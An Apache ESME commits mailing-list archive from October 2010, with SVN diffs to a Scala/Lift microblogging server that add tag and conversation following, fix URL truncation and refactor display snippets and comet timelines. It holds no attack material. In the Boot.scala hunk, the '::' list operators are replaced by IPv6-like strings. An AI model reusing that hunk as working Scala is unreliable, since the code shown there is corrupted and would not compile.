incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala Sun Oct 10 18:07:49 2010 @@ -279,7 +279,7 @@ object Message extends Message with Long @Searchable -class Message extends LongKeyedMapper[Message] { +class Message extends LongKeyedMapper[Message] with ManyToMany { import Message._ def getSingleton = Message // what's the "meta" server @@ -324,7 +324,9 @@ class Message extends LongKeyedMapper[Me object replyTo extends MappedLongForeignKey(this, Message) - object conversation extends MappedLongForeignKey(this, Message) + object conversation extends MappedLongForeignKey(this, Message) + + object followers extends MappedManyToMany(UserConvFollow, UserConvFollow.conversation, UserConvFollow.user, User) object pool extends MappedLongForeignKey(this, AccessPool) { override def asJs = Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/MessageTag.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/MessageTag.scala?rev=1006328&r1=1006327&r2=1006328&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/MessageTag.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/MessageTag.scala Sun Oct 10 18:07:49 2010 @@ -36,7 +36,7 @@ class MessageTag extends LongKeyedMapper object id extends MappedLongIndex(this) object message extends MappedLongForeignKey(this, Message) - object tag extends MappedLongForeignKey(this, Tag) // MappedText(this) + object tag extends MappedLongForeignKey(this, Tag) object sentTo extends MappedLongForeignKey(this, User) object url extends MappedLongForeignKey(this, UrlStore) } Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Tag.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Tag.scala?rev=1006328&r1=1006327&r2=1006328&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Tag.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Tag.scala Sun Oct 10 18:07:49 2010 @@ -61,12 +61,14 @@ object Tag extends Tag with MetaProtoTag } -class Tag extends ProtoTag[Tag] { - def getSingleton = Tag // what's the "meta" server +class Tag extends ProtoTag[Tag] with ManyToMany { + def getSingleton = Tag // what's the "meta" server def findMessages(): List[Message] = Message.findAndPrime(In.fk(MessageTag.message, By(MessageTag.tag, this)), OrderBy(Message.id, Descending)) - override def toXml = <tag id={id.is.toString} name={name.is}>{"#" + name.is}</tag> -} + override def toXml = <tag id={id.is.toString} name={name.is}>{"#" + name.is}</tag> + + object followers extends MappedManyToMany(UserTagFollow, UserTagFollow.tag, UserTagFollow.user, User) +} Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/User.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/User.scala?rev=1006328&r1=1006327&r2=1006328&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/User.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/User.scala Sun Oct 10 18:07:49 2010 @@ -198,7 +198,7 @@ object User extends User with KeyedMetaM /** * An O-R mapped "User" class that includes first name, last name, password */ -class User extends KeyedMapper[Long, User] with UserIdAsString {// OpenIDProtoUser[User] { +class User extends KeyedMapper[Long, User] with UserIdAsString with ManyToMany {// OpenIDProtoUser[User] { import S._ def getSingleton = User // what's the "meta" server @@ -400,5 +400,9 @@ class User extends KeyedMapper[Long, Use def timezoneDisplayName = S.?("base_user_ui_timezone") - def localeDisplayName = S.?("base_user_ui_locale") + def localeDisplayName = S.?("base_user_ui_locale") + + object tagsfollowing extends MappedManyToMany(UserTagFollow, UserTagFollow.user, UserTagFollow.tag, Tag) + + object convsfollowing extends MappedManyToMany(UserConvFollow, UserConvFollow.user, UserConvFollow.conversation, Message) } Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/snippet/TagDisplay.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/snippet/TagDisplay.scala?rev=1006328&r1=1006327&r2=1006328&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/snippet/TagDisplay.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/snippet/TagDisplay.scala Sun Oct 10 18:07:49 2010 @@ -82,17 +82,47 @@ object TagDisplay { "date" -> Text(new Date(m.when.is).toString)) } - def display(in: NodeSeq): NodeSeq = { - val name = (S.param("tag") openOr "N/A").trim + def display(in: NodeSeq): NodeSeq = { + + val name = (S.param("tag") openOr "N/A").trim + + val tag = Tag.findAll(By(Tag.name, name)) + val user = User.currentUser val tagList: List[Message] = for { - tag <- Tag.findAll(By(Tag.name, name)) - item <- tag.findMessages() - } yield item + t <- tag + item <- t.findMessages() + } yield item + + def followOrUnfollow: NodeSeq = { + val ret: Box[NodeSeq] = for { + u <- user + t = tag.first + } yield { + if (!t.followers.contains(u)) { + ajaxButton("Follow tag", () => { + t.followers += u + t.save + updateFollow + }) + } else { + ajaxButton("Unfollow tag", () => { + t.followers -= u + t.save + updateFollow + }) + } + } + + ret.open_! + } + + def updateFollow: JsCmd = SetHtml("following", followOrUnfollow) bind("tag", in, "name" -> name, - "each" -> bindTag(tagList) _) + "each" -> bindTag(tagList) _, + "followButton" -> followOrUnfollow ) - } + } } Modified: incubator/esme/trunk/server/src/main/webapp/info_view/conversation.html URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/webapp/info_view/conversation.html?rev=1006328&r1=1006327&r2=1006328&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/webapp/info_view/conversation.html (original) +++ incubator/esme/trunk/server/src/main/webapp/info_view/conversation.html Sun Oct 10 18:07:49 2010 @@ -17,24 +17,25 @@ under the License. * --> <lift:surround with="base" at="left"> - <lift:TableSorterSnip/> - <link rel="stylesheet" type="text/css" href="../style/style.css" /> -<head> - <script src="../scripts/display_messages.js" type="text/javascript"/> - <script src="../scripts/pretty.js" type="text/javascript"/> -</head> - -<div id="back-header"> - <h1><lift:loc>ui_default_conversation</lift:loc></h1> - <div class="container-aux"> - <div> - <lift:displayConversation/> - <lift:embed what="templates-hidden/message_core"/> - </div> - </div><!--container-settings--> + <lift:TableSorterSnip/> + <link rel="stylesheet" type="text/css" href="../style/style.css" /> + <head> + <script src="../scripts/display_messages.js" type="text/javascript"/> + <script src="../scripts/pretty.js" type="text/javascript"/> + </head> + + <div id="back-header"> + <lift:conv_info> + <h1><lift:loc>ui_default_conversation</lift:loc></h1> + <div class="container-aux"> + <span id="following"><conv:followButton/></span> + <div> + <conv:displayConversation/> + <lift:embed what="templates-hidden/message_core"/> + </div> + </div><!--container-settings--> + </lift:conv_info> </div> - - <!-- End demo --> </lift:surround> Modified: incubator/esme/trunk/server/src/main/webapp/info_view/tag.html URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/webapp/info_view/tag.html?rev=1006328&r1=1006327&r2=1006328&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/webapp/info_view/tag.html (original) +++ incubator/esme/trunk/server/src/main/webapp/info_view/tag.html Sun Oct 10 18:07:49 2010 @@ -22,7 +22,8 @@ <lift:tag_display> <div id="back-header"> <h1><lift:loc>ui_tag_title</lift:loc><i> '<tag:name/>'</i></h1> -<div class="container-settings"> +<div class="container-settings"> + <span id="following"><tag:followButton/></span> <table id="esme-table" class="tablesorter"> <thead> From [email protected] Fri Oct 15 13:46:12 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 64943 invoked from network); 15 Oct 2010 13:46:11 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 15 Oct 2010 13:46:11 -0000 Received: (qmail 68166 invoked by uid 500); 15 Oct 2010 13:46:11 -0000 Delivered-To: [email protected] Received: (qmail 68132 invoked by uid 500); 15 Oct 2010 13:46:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <esme-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 68124 invoked by uid 99); 15 Oct 2010 13:46:08 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 15 Oct 2010 13:46:08 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 15 Oct 2010 13:46:06 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 5E49B238897A; Fri, 15 Oct 2010 13:45:09 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1022916 - /incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala Date: Fri, 15 Oct 2010 13:45:09 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: vdichev Date: Fri Oct 15 13:45:09 2010 New Revision: 1022916 URL: http://svn.apache.org/viewvc?rev=1022916&view=rev Log: Fix exception on short urls. Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala?rev=1022916&r1=1022915&r2=1022916&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala Fri Oct 15 13:45:09 2010 @@ -401,7 +401,12 @@ class Message extends LongKeyedMapper[Me url.toString else "/u/" + id - <xml:group> <a class="tiplelement" href={href} target="_blank" title={url}>{url.toString.substring(0,20)}...</a> </xml:group> + def truncateUrl(urlString: String, len: Int) = + if (urlString.length <= len) + urlString + else + urlString.substring(0, len - 3) + "..." + <xml:group> <a class="tiplelement" href={href} target="_blank" title={url}>{truncateUrl(url.toString, 20)}</a> </xml:group> } ).getOrElse(Text("") ) From [email protected] Sat Oct 16 14:48:52 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 99711 invoked from network); 16 Oct 2010 14:48:52 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 16 Oct 2010 14:48:52 -0000 Received: (qmail 83669 invoked by uid 500); 16 Oct 2010 14:48:52 -0000 Delivered-To: [email protected] Received: (qmail 83636 invoked by uid 500); 16 Oct 2010 14:48:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <esme-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 83628 invoked by uid 99); 16 Oct 2010 14:48:52 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 16 Oct 2010 14:48:52 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 16 Oct 2010 14:48:50 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id E649523888EC; Sat, 16 Oct 2010 14:47:54 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1023299 - in /incubator/esme/trunk/server/src/main/scala: bootstrap/liftweb/ org/apache/esme/lib/ org/apache/esme/snippet/ Date: Sat, 16 Oct 2010 14:47:54 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: esjewett Date: Sat Oct 16 14:47:54 2010 New Revision: 1023299 URL: http://svn.apache.org/viewvc?rev=1023299&view=rev Log: Refactoring a bit to make the snippets used in User and Tag displays separate. These will probably get blown away entirely when we switch to a canonical timeline view, but I only figured that out after I'd done the refactoring. Added: incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/MessageUtils.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/snippet/UserDisplay.scala Modified: incubator/esme/trunk/server/src/main/scala/bootstrap/liftweb/Boot.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/ConversationMgr.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/snippet/TagDisplay.scala Modified: incubator/esme/trunk/server/src/main/scala/bootstrap/liftweb/Boot.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/bootstrap/liftweb/Boot.scala?rev=1023299&r1=1023298&r2=1023299&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/bootstrap/liftweb/Boot.scala (original) +++ incubator/esme/trunk/server/src/main/scala/bootstrap/liftweb/Boot.scala Sat Oct 16 14:47:54 2010 @@ -171,7 +171,7 @@ class Boot { // Build SiteMap val entries = Menu(Loc("Home", List("index"), "Home")) acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b Menu(Loc("user", List("info_view", "user"), "User Info", ifIsLoggedIn, - Loc.Snippet("user_info", TagDisplay.userInfo))) acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b + Loc.Snippet("user_info", UserDisplay.userInfo))) acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b logLevel.menu acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b Menu(Loc("tag", List("info_view", "tag"), "Tag", ifIsLoggedIn, Loc.Snippet("tag_display", TagDisplay.display))) acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/ConversationMgr.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/ConversationMgr.scala?rev=1023299&r1=1023298&r2=1023299&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/ConversationMgr.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/ConversationMgr.scala Sat Oct 16 14:47:54 2010 @@ -85,8 +85,6 @@ object ConversationMgr { val jsId = "timeline_messages" - val cid = S.param("cid").map(toLong).openOr(-1L) - val msgs = Message.findAndPrime(By(Message.conversation, cid), OrderBy(Message.id, Descending)) Added: incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/MessageUtils.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/MessageUtils.scala?rev=1023299&view=auto ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/MessageUtils.scala (added) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/MessageUtils.scala Sat Oct 16 14:47:54 2010 @@ -0,0 +1,50 @@ +/** + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ + +package org.apache.esme.lib + +import org.apache.esme._ +import model._ +import org.apache.esme.actor._ + +import net.liftweb._ +import http._ +import SHtml._ +import js._ +import JsCmds._ +import JE._ +import util._ +import common._ +import Helpers._ + +import mapper._ + +import scala.xml.{NodeSeq, Text} +import java.util.Date + +object MessageUtils { + def bindMessages(messageList: List[Message])(in: NodeSeq): NodeSeq = + messageList.flatMap{m => + val nickname = m.author.obj.map(_.nickname.is) openOr "" + bind("item", in, + "author" -> <a href={"/user/"+urlEncode(nickname)}>{nickname}</a>, + "body" -> m.digestedXHTML, + "date" -> Text(new Date(m.when.is).toString)) + } +} \ No newline at end of file Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/snippet/TagDisplay.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/snippet/TagDisplay.scala?rev=1023299&r1=1023298&r2=1023299&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/snippet/TagDisplay.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/snippet/TagDisplay.scala Sat Oct 16 14:47:54 2010 @@ -20,7 +20,8 @@ package org.apache.esme.snippet import org.apache.esme._ -import model._ +import model._ +import lib.MessageUtils import org.apache.esme.actor._ import net.liftweb._ @@ -39,48 +40,6 @@ import scala.xml.{NodeSeq, Text} import java.util.Date object TagDisplay { - def userInfo(in: NodeSeq): NodeSeq = { - val user: User = S.param("uid").flatMap(User.findFromWeb) openOr { - S.error(S.?("base_ui_no_user_found")) - S.redirectTo(S.referer openOr "/") - } - - def updateFollow: JsCmd = SetHtml("following", followOrNot) - - def followOrNot: NodeSeq = { - User.currentUser match { - case Full(u) if u != user => - if (u.following_?(user)) - ajaxButton(S.?("base_ui_unfollow"), () => {u.unfollow(user); updateFollow}) - else ajaxButton(S.?("base_ui_follow"), () => {u.follow(user); updateFollow}) - - case _ => <xml:group> <div class="thatsyou">{S.?("base_user_thats_you")}</div></xml:group> - } - } - - - bind("user", in, - "nicename" -> user.niceName, - "lastName" -> user.lastName, - "firstName" -> user.firstName, - "image" -> user.image_url, - "followButton" -> followOrNot, - "timeline" -> bindTag(Mailbox.mostRecentMessagesFor(user.id, 50).map(_._1)) _, - "messages" -> bindTag(Message.findAll(By(Message.author, user), OrderBy(Message.id, Descending), MaxRows(50))) _, - AttrBindParam("userId", Text(user.id.toString),"userId") - ) - - - } - - private def bindTag(tagList: List[Message])(in: NodeSeq): NodeSeq = - tagList.flatMap{m => - val nickname = m.author.obj.map(_.nickname.is) openOr "" - bind("item", in, - "author" -> <a href={"/user/"+urlEncode(nickname)}>{nickname}</a>, - "body" -> m.digestedXHTML, - "date" -> Text(new Date(m.when.is).toString)) - } def display(in: NodeSeq): NodeSeq = { @@ -89,7 +48,7 @@ object TagDisplay { val tag = Tag.findAll(By(Tag.name, name)) val user = User.currentUser - val tagList: List[Message] = + val messageList: List[Message] = for { t <- tag item <- t.findMessages() @@ -121,8 +80,8 @@ object TagDisplay { def updateFollow: JsCmd = SetHtml("following", followOrUnfollow) bind("tag", in, "name" -> name, - "each" -> bindTag(tagList) _, + "each" -> MessageUtils.bindMessages(messageList) _, "followButton" -> followOrUnfollow ) - } + } } Added: incubator/esme/trunk/server/src/main/scala/org/apache/esme/snippet/UserDisplay.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/snippet/UserDisplay.scala?rev=1023299&view=auto ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/snippet/UserDisplay.scala (added) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/snippet/UserDisplay.scala Sat Oct 16 14:47:54 2010 @@ -0,0 +1,78 @@ +/** + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ + +package org.apache.esme.snippet + +import org.apache.esme._ +import model._ +import lib.MessageUtils +import org.apache.esme.actor._ + +import net.liftweb._ +import http._ +import SHtml._ +import js._ +import JsCmds._ +import JE._ +import util._ +import common._ +import Helpers._ + +import mapper._ + +import scala.xml.{NodeSeq, Text} +import java.util.Date + +object UserDisplay { + def userInfo(in: NodeSeq): NodeSeq = { + val user: User = S.param("uid").flatMap(User.findFromWeb) openOr { + S.error(S.?("base_ui_no_user_found")) + S.redirectTo(S.referer openOr "/") + } + + def updateFollow: JsCmd = SetHtml("following", followOrNot) + + def followOrNot: NodeSeq = { + User.currentUser match { + case Full(u) if u != user => + if (u.following_?(user)) + ajaxButton(S.?("base_ui_unfollow"), () => {u.unfollow(user); updateFollow}) + else ajaxButton(S.?("base_ui_follow"), () => {u.follow(user); updateFollow}) + + case _ => <xml:group> <div class="thatsyou">{S.?("base_user_thats_you")}</div></xml:group> + } + } + + + bind("user", in, + "nicename" -> user.niceName, + "lastName" -> user.lastName, + "firstName" -> user.firstName, + "image" -> user.image_url, + "followButton" -> followOrNot, + "timeline" -> MessageUtils.bindMessages(Mailbox.mostRecentMessagesFor(user.id, 50).map(_._1)) _, + "messages" -> MessageUtils.bindMessages(Message.findAll( + By(Message.author, user), + OrderBy(Message.id, Descending), + MaxRows(50))) _, + AttrBindParam("userId", Text(user.id.toString),"userId") + ) + + } +} \ No newline at end of file From [email protected] Sat Oct 16 15:30:58 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12579 invoked from network); 16 Oct 2010 15:30:58 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 16 Oct 2010 15:30:58 -0000 Received: (qmail 20364 invoked by uid 500); 16 Oct 2010 15:30:58 -0000 Delivered-To: [email protected] Received: (qmail 20325 invoked by uid 500); 16 Oct 2010 15:30:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <esme-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20317 invoked by uid 99); 16 Oct 2010 15:30:58 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 16 Oct 2010 15:30:58 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 16 Oct 2010 15:30:57 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id D5E752388993; Sat, 16 Oct 2010 15:30:01 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1023308 - in /incubator/esme/trunk/server/src/main: scala/org/apache/esme/actor/Distributor.scala scala/org/apache/esme/comet/PersonalTimeline.scala scala/org/apache/esme/comet/Timeline.scala webapp/templates-hidden/message.html Date: Sat, 16 Oct 2010 15:30:01 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: esjewett Date: Sat Oct 16 15:30:01 2010 New Revision: 1023308 URL: http://svn.apache.org/viewvc?rev=1023308&view=rev Log: [ESME-287] First round of refactoring to set up identically formatted comet timelines for all message list displays. Partially complete, but passing all tests. Added: incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/PersonalTimeline.scala Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/Timeline.scala incubator/esme/trunk/server/src/main/webapp/templates-hidden/message.html Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala?rev=1023308&r1=1023307&r2=1023308&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala Sat Oct 16 15:30:01 2010 @@ -51,9 +51,9 @@ object Distributor extends LiftActor { // toact ! UserActor.CreateMessage(text, tags, // when, metaData, source, inReplyTo, pool) - forwardMessageTo( - UserActor.CreateMessage(text,tags,when,metaData,source,inReplyTo,pool), - toact) + forwardMessageTo( + UserActor.CreateMessage(text,tags,when,metaData,source,inReplyTo,pool), + toact) toact ! text Added: incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/PersonalTimeline.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/PersonalTimeline.scala?rev=1023308&view=auto ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/PersonalTimeline.scala (added) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/PersonalTimeline.scala Sat Oct 16 15:30:01 2010 @@ -0,0 +1,41 @@ +/** + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ + +package org.apache.esme.comet + +import net.liftweb.common._ + +import org.apache.esme._ +import actor.Distributor +import model._ + +class PersonalTimeline extends Timeline { + + override def localSetup() { + super.localSetup() + for (user <- User.currentUser) { + Distributor ! Distributor.Listen(user.id, this) + Distributor !? (2000, Distributor.LatestMessages(user.id, 40)) match { + case Full(msg: List[(Long,MailboxReason,Boolean)]) => messages = msg + case x => + } + } + } + +} \ No newline at end of file Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/Timeline.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/Timeline.scala?rev=1023308&r1=1023307&r2=1023308&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/Timeline.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/comet/Timeline.scala Sat Oct 16 15:30:01 2010 @@ -35,18 +35,11 @@ import lib._ import java.text._ -class Timeline extends CometActor { - private var messages: List[(Long,MailboxReason,Boolean)] = Nil +trait Timeline extends CometActor { + protected var messages: List[(Long,MailboxReason,Boolean)] = Nil override def localSetup() { super.localSetup() - for (user <- User.currentUser) { - Distributor ! Distributor.Listen(user.id, this) - Distributor !? (2000, Distributor.LatestMessages(user.id, 40)) match { - case Full(msg: List[(Long,MailboxReason,Boolean)]) => messages = msg - case x => - } - } } override def localShutdown() { Modified: incubator/esme/trunk/server/src/main/webapp/templates-hidden/message.html URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/webapp/templates-hidden/message.html?rev=1023308&r1=1023307&r2=1023308&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/webapp/templates-hidden/message.html (original) +++ incubator/esme/trunk/server/src/main/webapp/templates-hidden/message.html Sat Oct 16 15:30:01 2010 @@ -101,7 +101,7 @@ </div> <lift:UserSnip.resendScript/> <!--updates-box --> - <lift:comet type="Timeline"/> + <lift:comet type="PersonalTimeline"/> <div id="personal_timeline_messages"> <div class="updates-box" id="message"> From [email protected] Mon Oct 18 10:02:11 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 65799 invoked from network); 18 Oct 2010 10:02:11 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 18 Oct 2010 10:02:11 -0000 Received: (qmail 55603 invoked by uid 500); 18 Oct 2010 10:02:11 -0000 Delivered-To: [email protected] Received: (qmail 55572 invoked by uid 500); 18 Oct 2010 10:02:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <esme-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 55564 invoked by uid 99); 18 Oct 2010 10:02:09 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 18 Oct 2010 10:02:09 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 18 Oct 2010 10:02:07 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id E2DF12388A1C; Mon, 18 Oct 2010 10:01:11 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1023718 - in /incubator/esme/trunk/server/src/main: scala/org/apache/esme/actor/ scala/org/apache/esme/comet/ scala/org/apache/esme/lib/ webapp/info_view/ webapp/style/ webapp/templates-hidden/ Date: Mon, 18 Oct 2010 10:01:11 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: esjewett Date: Mon Oct 18 10:01:11 2010 New Revision: 1023718 URL: http://svn.apache.org/viewvc?rev=1023718&view=rev Log: [ESME-287] [ESME-289] Update conversation timeline to use same formatting as the main timeline (mostly just some CSS and HTML tweaking in this case) and to have new messages pushed via comet whenever new messages are available. Also some serious refactoring of templates to improve DRY-ness, and refactoring of the comet Timeline classes to accomodate this change as well as the upcoming change for 